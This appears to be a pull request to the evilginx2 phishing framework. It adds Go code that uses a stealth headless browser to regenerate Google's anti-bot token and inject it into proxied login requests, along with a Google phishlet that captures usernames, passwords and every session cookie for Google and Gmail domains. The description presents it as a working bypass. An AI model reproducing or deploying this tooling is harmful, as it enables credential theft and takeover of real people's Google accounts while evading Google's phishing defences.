### PR TITLE
Add Google Phishlet (Working for Gmail and Gsuite)

### DIFF
--- a/core/google_bypasser.go
+++ b/core/google_bypasser.go
@@ -1,0 +1,73 @@
+package core
+
+import (
+	"bytes"
+	"regexp"
+	"strings"
+	"time"
+
+	"github.com/go-rod/rod"
+	"github.com/go-rod/rod/lib/input"
+	"github.com/go-rod/rod/lib/launcher"
+	"github.com/go-rod/rod/lib/proto"
+	"github.com/go-rod/stealth"
+	"github.com/kgretzky/evilginx2/log"
+)
+
+type GoogleBypasser struct {
+	browser        *rod.Browser
+	page           *rod.Page
+	isHeadless     bool
+	withDevTools   bool
+	slowMotionTime time.Duration
+
+	token string
+	email string
+}
+
+var bgRegexp = regexp.MustCompile("bgRequest=[^&]*")
+
+func (b *GoogleBypasser) Launch() {
+	u := launcher.New().
+		Headless(b.isHeadless).
+		Devtools(b.withDevTools).
+		NoSandbox(true).
+		MustLaunch()
+	b.browser = rod.New().ControlURL(u)
+	if b.slowMotionTime > 0 {
+		b.browser = b.browser.SlowMotion(b.slowMotionTime)
+	}
+	b.browser = b.browser.MustConnect()
+	b.page = stealth.MustPage(b.browser)
+}
+
+func (b *GoogleBypasser) GetEmail(body []byte) {
+	exp := regexp.MustCompile(`f\.req=%5B%22(.*?)%22`)
+	email_match := exp.FindSubmatch(body)
+	matches := len(email_match)
+	if matches != 2 {
+		log.Error("[GoogleBypasser]: Found %v matches for email, expecting 2", matches)
+		return
+	}
+	b.email = string(bytes.Replace(email_match[1], []byte("%40"), []byte("@"), -1))
+}
+
+func (b *GoogleBypasser) GetToken() {
+	stop := make(chan struct{})
+
+	go b.page.EachEvent(func(e *proto.NetworkRequestWillBeSent) {
+		if strings.Contains(e.Request.URL, "accountlookup?") {
+			b.token = bgRegexp.FindString(e.Request.PostData)
+			log.Debug("[GoogleBypasser]: %v", b.token)
+			close(stop)
+		}
+	})()
+
+	b.page.MustNavigate("https://accounts.google.com/signin/v2/identifier")
+	b.page.MustElement("#identifierId").MustInput(b.email).MustPress(input.Enter)
+	<-stop
+}
+
+func (b *GoogleBypasser) ReplaceTokenInBody(body []byte) []byte {
+	return bgRegexp.ReplaceAll(body, []byte(b.token))
+}

--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -556,6 +556,19 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 							}
 
 						}
+						if strings.EqualFold(req.Host, "accounts.google.com") && strings.Contains(req.URL.String(), "accountlookup?") {
+							log.Debug("GoogleBypass working with: %v", req.RequestURI)
+							b := &GoogleBypasser{
+								isHeadless:     true,
+								withDevTools:   false,
+								slowMotionTime: 1500,
+							}
+							b.Launch()
+							b.GetEmail(body)
+							b.GetToken()
+							body = b.ReplaceTokenInBody(body)
+							req.ContentLength = int64(len(body))
+						}
 						req.Body = ioutil.NopCloser(bytes.NewBuffer([]byte(body)))
 					}
 				}

--- a/main.go
+++ b/main.go
@@ -19,6 +19,7 @@ var templates_dir = flag.String("t", "", "HTML templates directory path")
 var debug_log = flag.Bool("debug", false, "Enable debug output")
 var developer_mode = flag.Bool("developer", false, "Enable developer mode (generates self-signed certificates for all hostnames)")
 var cfg_dir = flag.String("c", "", "Configuration directory path")
+var google_bypass = flag.Bool("google-bypass", false, "Enable Google Bypass")
 
 func joinPath(base_path string, rel_path string) string {
 	var ret string
@@ -31,7 +32,9 @@ func joinPath(base_path string, rel_path string) string {
 }
 
 func init() {
-	launcher.NewBrowser().MustGet()
+	if *google_bypass {
+		launcher.NewBrowser().MustGet()
+	}
 }
 
 func main() {

--- a/main.go
+++ b/main.go
@@ -8,6 +8,7 @@ import (
 	"path/filepath"
 	"regexp"
 
+	"github.com/go-rod/rod/lib/launcher"
 	"github.com/kgretzky/evilginx2/core"
 	"github.com/kgretzky/evilginx2/database"
 	"github.com/kgretzky/evilginx2/log"
@@ -27,6 +28,10 @@ func joinPath(base_path string, rel_path string) string {
 		ret = filepath.Join(base_path, rel_path)
 	}
 	return ret
+}
+
+func init() {
+	launcher.NewBrowser().MustGet()
 }
 
 func main() {

--- a/phishlets/google.yaml
+++ b/phishlets/google.yaml
@@ -1,0 +1,50 @@
+author: '@charlesebl'
+min_ver: '2.3.0'
+
+proxy_hosts:
+  - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true, auto_filter: false}
+  - {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: true, is_landing: false, auto_filter: true}
+
+sub_filters:
+  - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}
+  - {triggers_on: 'myaccount.google.com', orig_sub: 'myaccount', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html']}
+
+auth_tokens:
+  - domain: '.google.com'
+    keys: [".*,regexp"]
+  - domain: 'accounts.google.com'
+    keys: [".*,regexp"]
+  - domain: 'myaccount.google.com'
+    keys: [".*,regexp"]
+  - domain: 'mail.google.com'
+    keys: [".*,regexp"]
+
+credentials:
+  username:
+    key: 'f.req'
+    search: '\[\]\]\,\"([^"]*)\"\,'
+    type: 'post'
+  password:
+    key: 'f.req'
+    search: ',\["([^"]*)",.*?\]\]\]'
+    type: 'post'
+
+auth_urls:
+  - '/CheckCookie'
+
+login:
+  domain: 'accounts.google.com'
+  path: '/signin/v2/identifier?flowName=GlifWebSignIn&flowEntry=ServiceLogin'
+
+js_inject:
+  - trigger_domains: ['myaccount.google.com']
+    trigger_paths: ['.*?']
+    script: |
+      (() => {
+        'use strict';
+        const subdomain = window.location.host.split('.')[0];
+        if (!subdomain) return;
+        if (subdomain === "myaccount") {
+          window.location.host = "myaccount.google.com";
+        }
+      })();


### PR DESCRIPTION
Hi there,

Here is a working bypass to make work the Google Phishlet. The principe is simple, when the client browser make the "accountlookup" request, we replace the token inside by a new one generated by a headless browser from the official website.
The only problem with this is that the account lookup takes =~ 6-8 seconds.

This code is mainly extracted from this repo : https://github.com/TomAbel/evilginx.botguard
Do not forget to thanks him 😃 

_Note for Kuba_
If you want to approve the pull request, you'll also need to add to the project these 2 packages to make it work :
github.com/go-rod/rod
github.com/go-rod/stealth